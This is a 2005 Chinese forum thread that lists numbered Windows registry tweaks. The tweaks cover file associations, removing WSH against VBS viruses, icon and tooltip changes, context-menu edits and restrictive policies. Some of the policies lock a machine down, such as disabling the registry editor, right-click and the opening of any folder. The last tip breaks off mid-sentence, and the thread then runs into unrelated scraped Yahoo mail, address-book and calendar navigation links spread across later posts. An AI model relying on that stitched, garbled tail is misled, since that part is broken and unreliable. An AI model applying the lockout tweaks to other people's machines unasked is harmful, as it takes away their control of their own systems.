打开"运行"窗口,输入"Regedit"回车。点击HKEY_CLASSES_ROOT,然后新建一个主键,如".myf"(注意,这个扩展名为你保存文件时所用的扩展名,假如自己的文件格式的扩展名为fff,那么则应是:.fff),然后双击右边窗口中的"(默认)"值,输入"myffile"。然后再点击HKEY_CLASSES_ROOT,新建一个主键,为"myffile",点击"myffile",再新建一个"defaultIcon"键,这是用于显示图标的,双击右窗口的"(默认)"值,输入你的编辑器的所在路径(这样你的文件的图标就会显示编辑器中所使用的图标),再新建一个主键"Shell",在Shell中再新建一个open主键,再在open中新建一个command主键,双击右边的"(默认)"键值,输入编辑器的路径:d:\kbk\stnc.exe 1%。 
好了,这样就把自己的程序与自己的文件关联起来啦! 
我们可以来看看效果:用自己的编辑器保存一个文件,文件扩展名为myf。怎么样?呵呵,图标变成自己的编辑器图标啦,双击它看看,哈哈,编辑器启动啦,而且还自动打开了这个文件。 
简单吧?还等什么,快去试试。 
我的e-mail:vber@21cn.com,有任何疑问,欢迎来信交流 
 
 
(09) WSH 卸载方法 
WSH(Windows Script Host )是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH,用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。在Windows2000下,还可用WSH来访问Windows NT活动目录服务。在带给人们便利的同时,WSH也为病毒的传播留下可乘之机。 

WSH依赖于Internet Explorer 3.0(或以上)提供的Visual Basic Script 和 Jscript脚本引擎,因此只有在安装了Internet Explorer 3.0(或以上)之后,才能安装WSH。 

对于Windows 98,WSH是作为操作系统的一个组件自动安装的,但用户可以从控制面板-->添加/删除程序--〉Windows安装程序--〉附件,然后将“Windows Scripting Host”前的对勾去掉,再确定即可,这样可以有效预防“欢乐时光”病毒。 

  • 2005-8-27 10:51
  • 回复
  • srxljl
  • 9位粉丝

18楼


以下步骤未能卸载系统中的WSH,只能保证双击vbs后缀的文件时,不让其运行。因此,对于“欢乐时光”病毒还是不能完全预防。但是,可以有效防止“爱虫”此类通过邮件附件传播的VBS脚本语言病毒。

对于Windows 2000和Windows ME,从开始--〉程序--〉Windows资源管理器--〉工具--〉文件夹选项--〉文件类型,将滚动条下移找到VBScript脚本文件,将其删除。 

对于Windows 95和Windows NT 4.0, 从开始--〉程序--〉Windows资源管理器或Windows NT资源管理器--〉查看--〉选项--〉文件类型,将滚动条下移找到VBScript脚本文件,将其删除。
 
 
 
(10) 恢复网页右键菜单 
在 HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions 下,找到 DWORD 值 "NoBrowserContextMenu" ,将其键值改为 “0” 或 删除此键都能达到 恢复网页右键菜单 的目的…… 
 
 
(11) 修改>> “鼠标右键” 弹出菜单 
我们单击 C,D 盘,然后点击鼠标右键,会弹出菜单,要把 Browse wth ACDSee 去掉,打开 HKEY_CLASSES_ROOT\Drive\shell 我们可看到有主键 Browse with ACDSee ,把该主键删除,即可把菜单中的 Browse with ACDSee 去掉。

在 gif 类型的文件名上点击鼠标右键弹出的菜单在 HKEY_CLASSES_ROOT\GIFFILE\SHELL 中,可按上述方法修改。在cda类型的文件名上点击鼠标右键弹出的菜单在 HKEY_CLASSES_ROOT\CDAFILE\SHELL 中,可按上述方法修改。要找某种类型的菜单中,可在 HKEY_CALSSES_ROOT\???FILE\SHELL (??? 代表所要找的文件类型)

其实最简单的解决方法是打开注册表查找右键弹出菜单的名字,找到后删除就可以了…… 
 
 
(12) 禁止 PC 在出错时发出声音 
在 HKEY_CURRENT_USER\Control Panel\Sound 下,在右边的窗口中,把字符串 “Beep” 的值改为 “No”…… 
 
 
(13) 禁止修改 “显示属性” 
在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 下,在右边的窗口中创建一个 DOWRD 值 “NoDispCPL”,并将其值设为“1”…… 
 
 
(14) 禁用>> 注册表编辑器 (regedit.exe) 
在 HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System 下,在右边的窗口中创建一个 DOWRD 值 "DisableRegistryTools" ,并将其值设为“1”,“0”表示允许…… 
 
 
(15) 禁止使用 reg 文件 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\.reg 下,在右边的窗口中更改 “默认” 值为 “txtfile”…… 
 
 
(16) 禁止使用 inf 文件 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\.inf下,在右边的窗口中更改 “默认” 值为 “txtfile”…… 
 
 
(17) 禁止使用鼠标右键 
在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下,在右边的窗口中新建一个二进制值 “NoViewContextMenu” ,并设值为 “01 00 00 00”……
修改后需重新启动计算机,以后,你将不能在桌面,驱动器,文件夹等地方使用鼠标右键…… 
 
 
(18) 自动播放光碟 
在 HKEY_CLASSES_ROOT\AudioCD\shell 下,在右边的窗口中修改字符串值 “默认”,改其值为空格…… 
 
 
(19) 自动运行光碟 
在 HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 下,在右边的窗口中创建一个二进制值 “NoDriveTypeAutoRun”,并将其值设为 “95 00 00 00” 想禁止自动运行,只需改为 "b5 00 00 00"…… 
 
 
(20) 设立缺省的 “用户名” 和 “公司名称” 
在 HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info 下,在右边窗口中找到字符串键 “DefCompany”,“DefName”,其中 DefCompany 是指公司名称,DefName是指用户名…… 
 
 
(21) 禁止>> 光标闪动 

  • 2005-8-27 10:51
  • 回复
  • srxljl
  • 9位粉丝

19楼

在 HKEY_USERS\.DEFAULT\Control Panel\desktop 下,在右边的窗口中创建一个字符串键 “CursorBlinkRate”,其值设为“-1”…… 
 
 
(22) 禁止>> 打开任何文件夹 
在 HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec 下,在右边的窗口中修改字符串键 “(默认)” 的值设为 “rem [ViewFolder("%l", %I, %S)]” ;同时在 HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec 下,在右边的窗口中修改字符串键 “(默认)” 的值设为 “rem [ViewFolder("%l", %I, %S)]” …… 
 
 
(23) 硬盘读取>> “星际” 游戏 
现在 “星际争霸” 非常流行,但大家是否觉得星际用光盘太麻烦,我现在就介绍一种通过修改注册表来实现硬盘读取游戏的方法:
   1:先安装 “星际争霸” 游戏
   2:打开注册表编辑器 (在 “开始” >> “运行” 里键入 “regedit”) 
   3:打开到 HKEY_LOCAL_MACHINE\Software\Blizzard Entertainment\starcraft 下,在右边窗口中找到 “InstallPath”,键值一般应该是 D:\.....E:\.....等(它你的光驱路径),就把其改为本地硬盘驱动器就行了…… 
 
 
(24) 启用 CPU 的二级缓存 (适用于WIN2000) 
在 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\Memory Management 下,在右边窗口中,我们可以更改 “SecondLevelDataCache” 的数值为 CPU 设置相应的数据…… 
 
 
(25) 增加>> 鼠标缓冲区 (适用于WIN2000) 
在 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Kbdclass\Parameters 下,在右边窗口中创建 “MouseDataQueueSize” 的 DOWRD 值,并设其值为你想要的缓存区大小…… 
 
 
(26) 增加>> 键盘的缓冲 (适用于WIN2000) 
在 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Kbdclass\Parameters 下,在右边窗口中修改 “KeyboardDataQueueSize” 的值为你想要的缓存大小…… 
 
 
(27) 为 “我的电脑” 改名、改图标 
在 HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D} 下,在右边的窗口中找到字符串值:“默认”,把“我的电脑”改为其它任意名称……
在 HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon 下,在右边的窗口中修改图标的路径…… 
 
 
(28) 为 “回收站” 改名、改图标 
在 HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E} 下,在右边的窗口中找到字符串值:“默认”,把 “回收站” 改为其它任意名称……
在 HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon 下,在右边的窗口中修改图标的路径…… 
 
 
(29) 更改>> “打印机” 的图标 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\DefaultIcon 下,在右边的窗口中修改字符串值 “(默认)” 为新图标的路径…… 
 
 
(30) 更改>> “收件箱” 的图标 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{00020D75-0000-0000-C000-000000000046}\DefaultIcon 下,在右边的窗口中修改字符串值 “(默认)” 为新图标的路径…… 
 
 
(31) 更改>> “计划任务” 的图标 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\DefaultIcon 下,在右边的窗口中修改字符串值 “(默认)” 为新图标的路径…… 
 
 
(32) 更改>> "我的公文包" 的图标 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D}\DefaultIcon 下,在右边的窗口中修改字符串值 “(默认)” 为新图标的路径…… 
 
 
(33) 更改>> 3.5 英寸软盘 的图标 
在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Icons 下,在右边的窗口中新建字符串值 "6",并设其值为新图标的路径…… 

  • 2005-8-27 10:51
  • 回复
  • srxljl
  • 9位粉丝

20楼

 
 
(34) 更改 "已打开文件夹" 的图标 
在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Icons 下,在右边的窗口中新建字符串值 "4",并设其值为新图标的路径…… 
 
 
(35) 更改>> "开始"菜单 >> "程序" 的图标 
在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Icons 下,在右边的窗口中新建字符串值 "19",并设其值为新图标的路径…… 
 
 
(36) 更改 "查找" 的图标 
在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Icons 下,在右边的窗口中新建字符串值 "22",并设其值为新图标的路径…… 
 
 
(37) 更改 "收藏夹" 的图标 
在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Icons 下,在右边的窗口中新建字符串值 "43",并设其值为新图标的路径…… 
 
 
(38) 更改>>"关闭系统" 的图标 
在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Icons 下,在右边的窗口中新建字符串值 "27",并设其值为新图标的路径…… 
 
 
(39) 更改 "运行" 的图标 
在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Icons 下,在右边的窗口中新建字符串值 "24",并设其值为新图标的路径…… 
 
 
(40) 更改 "注销" 的图标 
在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Icons 下,在右边的窗口中新建字符串值 "44",并设其值为新图标的路径…… 
 
 
(41) 更改>>可移动驱动器 的图标 
在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Icons 下,在右边的窗口中新建字符串值 "5",并设其值为新图标的路径…… 
 
 
(42) 更改 DOS 程序的图标 
在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Icons 下,在右边的窗口中新建字符串值"2",并设其值为新图标的路径…… 
 
 
(43) 更改 “回收站” 空的时候的提示信息 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{645FF040-5081-101B-9F08-00AA002F954E} 下,在右边的窗口中修改字符串键 “InfoTip” 的键值为你想要的提示信息,如:“干干净净,健康生活每一天”…… 
 
 
(44) 更改 “我的电脑” 的提示信息 
当我们把鼠标指向桌面上的 “我的电脑” 图标时,会显示一条提示信息,一般是:“显示计算机中的内容” 。看厌了这条提示了吗?想把它修改修改吗?
  在 HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D} 下,在右边的窗口中修改字符串键 “InfoTip” 的键值为 “你想要它显示的文字”…… 
 
 
(45) 更改 “回收站” 满的时候的提示信息 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}下,在右边的窗口中修改字符串键 “InfoTip” 的键值为你想要的提示信息,如:“垃圾已经很多啦!”…… 
 
 
(46) 更改 “我的文档” 的提示信息 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103} 下,在右边的窗口中修改字符串键 “InfoTip” 的键值为你想要的提示信息…… 
 
 
(47) 更改 “网上邻居” 的提示信息 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}下,在右边的窗口中修改字符串键 “InfoTip” 的键值为你想要的提示信息…… 
 
 
(48) 更改 “拨号网络” 的提示信息 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}下,在右边的窗口中修改字符串键 “InfoTip” 的键值为你想要的提示信息…… 

  • 2005-8-27 10:51
  • 回复
  • srxljl
  • 9位粉丝

21楼

 
 
(49) 更改 “任务计划” 的提示信息 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF} 下,修改字符串键 “InfoTip” 的键值为你想要的提示信息…… 
 
 
(50) 更改 “WEB文件夹” 的提示信息 
在 HKEY_CLASSES_ROOT\CLSID\{BDEADF00-C265-11d0-BCED-00A0C90AB50F} 下,在右边的窗口中,修改字符串键 “InfoTip” ,将其键值修改为你想要的文字,就可以更改 “WEB文件夹” 的提示信息了…… 
 
 
(51) 禁止>>删除打印机 
在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 下,在右边的窗口中新建一个 DWORD 值:“NoDeletePrinter”,其值为“1”…… 
 
 
(52) 禁止>>添加打印机 
在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 下,在右边的窗口中新建一个 DWORD 值:“NoAddPrinter”,其值为“1”…… 
 
 
(53) 禁止在 “系统属性” 中出现 “硬件配置文件” 菜单 
在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 下,在右边的窗口中新建一个 DWORD 值:“NoConfigPage”,其值为“1”…… 
 
 
(54) 禁止在 “系统属性” 中出现 “设备管理器” 菜单 
在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 下,在右边的窗口中新建一个 DWORD 值:“NoDevMgrPage”,其值为“1”…… 
 
 
(55) 禁止在 “系统属性” 中出现 “虚拟内存” 菜单 
在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 下,在右边的窗口中新建一个 DWORD 值:“NoVirtMemPage”,其值为“1”…… 
 
 
(56) 禁止在 “系统属性” 中出现 “文件系统” 菜单 
在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 下,在右边的窗口中新建一个 DWORD 值:“NoFileSysPage”,并设其值为“1”。 
 
 
(57) 禁止在 “显示属性” 中出现 “效果,web,设置” 分菜单 
在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 下,在右边的窗口中新建一个 DWORD 值:“NoDispSettingsPage”,其值为 “1”…… 
 
 
(58) 禁止在 “显示属性” 中出现 “屏幕保护程序” 分菜单 
在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 下,在右边的窗口中新建一个 DWORD 值:“NoDispScrSavPage”,并设其值为“1”…… 
 
 
(59) 为右键增加 “关闭系统” 选项 
在 HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DIRECTORY\SHELL 下新建主键 "关闭系统" ,在右边的窗口中将 "默认"键键值改为 "关闭系统"。
   在 HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DIRECTORY\SHELL\关闭系统 下,新建主键 "COMMAND" ,在右边的窗口中修改 “默认” 键键值为 "RUNDLL.EXE USER.EXE,EXITWINDOWS"…… 
 
 
(60) 为右键菜单增加 “重新启动计算机” 选项 
在 HKEY_LOCAL_MACHINE\Software\CLASSES\Directory\shell 下,新建主键 “重新启动计算机” ,在右边的窗口中修改 “默认” 键值为 “重新启动计算机”,在 HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DIRECTORY\shell\ 重新启动计算机 下,新建主键 "command",在右边的窗口中修改 “默认” 键的键值为 "RUNDLL.EXE USER.EXE,EXITWINDOWSEXEC" …… 
 
 
(61) 为文件夹的右键菜单添加运行 DOS 的命令 
在 HKEY_CLASSES_ROOT\Directory\shell 下创建一个主键 “CommandPrompt” ,在右边窗口中把 “默认” 的值改为:“Command”(或你喜欢的字符,此字符将显示在右键菜单中)并在此主键下创建一个主键 “command” ,再在右边窗口中把 “默认” 的值改为 “command.com /k cd "%1" ,好啦,去看看你的右键菜单上是不是多了一个 “Command” …… 

  • 2005-8-27 10:51
  • 回复
  • srxljl
  • 9位粉丝

22楼

 
 
(62) 为右键菜单增加“在新窗口中打开”的命令 
我们往往在 “文件夹选项” 中选择了在同一窗口中打开文件夹 ,但我们在浏览文件夹的时候,有时想比较一下两个文件夹的不同,或想开多个窗口浏览文件夹内容,可用下面的方法实现:
   到 HKEY_LOCAL_MACHINE\Software\CLASSES\Directory\shell 下,创建一个主键 “NewWindow” 在右边窗口中把 “默认” 的值改为:?/textarea>

最多 5000 个字符






最近修改的:
8/1/05 11:05PM













cancelClicked = 0;




更新

删除


取消













 
  版权所有 © 2005
 http://www.yahoo.com.cn">Yahoo!Inc. 保留所有权利。
 http://cn.privacy.yahoo.com/privacy/cn/">隐私权政策 - http://cn.docs.yahoo.com/info/utos.html">服务条款




电邮快捷键


http://cn.f156.mail.yahoo.com/ym/ShowFolder?rb=Inbox&YN=1&YY=436463">查信 Ctrl+http://us.i1.yimg.com/us.yimg.com/i/us/pim/r/medici/all/shift1.gif" width="9" height="8" alt="shift" border="0">+C
http://cn.f156.mail.yahoo.com/ym/Compose?YY=661257");else{window.location="http://cn.f156.mail.yahoo.com/ym/Compose?YY=849649";}'>写信 Ctrl+http://us.i1.yimg.com/us.yimg.com/i/us/pim/r/medici/all/shift1.gif" width="9" height="8" alt="shift" border="0">+P


    http://cn.f156.mail.yahoo.com/ym/Folders?YY=275520">文件夹 Ctrl+http://us.i1.yimg.com/us.yimg.com/i/us/pim/r/medici/all/shift1.gif" width="9" height="8" alt="shift" border="0">+F
    http://cn.f156.mail.yahoo.com/ym/Search?P=1&YY=61785">高级搜索 Ctrl+http://us.i1.yimg.com/us.yimg.com/i/us/pim/r/medici/all/shift1.gif" width="9" height="8" alt="shift" border="0">+S


  • http://cn.f156.mail.yahoo.com/ym/Options?YY=564863">选项

  • http://help.yahoo.com/help/cn/mail/">帮助 Ctrl+http://us.i1.yimg.com/us.yimg.com/i/us/pim/r/medici/all/shift1.gif" width="9" height="8" alt="shift" border="0">+H

    • 2005-8-27 10:51
    • 回复
    • srxljl
    • 9位粉丝

    23楼


     



    地址簿快捷键


  • http://cn.address.yahoo.com/yab/cn?addcontact">添加联系人

  • http://cn.address.yahoo.com/yab/cn?Add&A=g">添加类别

  • http://cn.address.yahoo.com/yab/cn?edit_grp">添加列表



    • http://cn.address.yahoo.com/yab/cn">查看联系人

    • http://cn.address.yahoo.com/yab/cn?A=v&cat=__ll">查看通讯组



    • http://cn.f156.mail.yahoo.com/ym/quickbuilder">快速添加

    • http://cn.address.yahoo.com/yab/cn?A=B">导入联系人



  • http://cn.address.yahoo.com/yab/cn?A=o">地址簿选项

  • http://help.yahoo.com/help/cn/ab/">地址簿帮助


  •  



    效率手册快捷键


  • http://cn.calendar.yahoo.com/YYY,4ed317/?v=5">添加活动

  • http://cn.calendar.yahoo.com/YYY,4ed317/?v=33">添加待办事项

  • http://cn.calendar.yahoo.com/YYY,4ed317/?v=5&evt_type=13">添加生日



    • http://cn.calendar.yahoo.com/YYY,4ed317/?v=0">日

    • http://cn.calendar.yahoo.com/YYY,4ed317/?v=1">周

    • http://cn.calendar.yahoo.com/YYY,4ed317/?v=2">月

    • http://cn.calendar.yahoo.com/YYY,4ed317/?v=3">年



    • http://cn.calendar.yahoo.com/YYY,4ed317/?v=42">活动列表

    • http://cn.calendar.yahoo.com/YYY,4ed317/?v=42&POS=0&TYP=101&MOD=0">提醒功能

    • http://cn.calendar.yahoo.com/YYY,4ed317/?v=32">待办事项



    • http://cn.calendar.yahoo.com/YYY,4ed317/?v=84">共享



  • http://cn.calendar.yahoo.com/YYY,4ed317/?v=70">效率手册选项

  • http://help.yahoo.com/help/cn/cal/">效率手册帮助






  • 记事本快捷键


  • http://notepad.mail.yahoo.com/YYY,754723/?v=161&pv=161">新增便笺

  • http://notepad.mail.yahoo.com/YYY,754723/?v=168&pv=161">添加文件夹



    • http://notepad.mail.yahoo.com/YYY,754723/?v=164&pv=161">查看便笺



  • http://notepad.mail.yahoo.com/YYY,754723/?v=165&pv=161">记事本选项

  • http://help.yahoo.com/help/cn/notepad/">记事本帮助


  •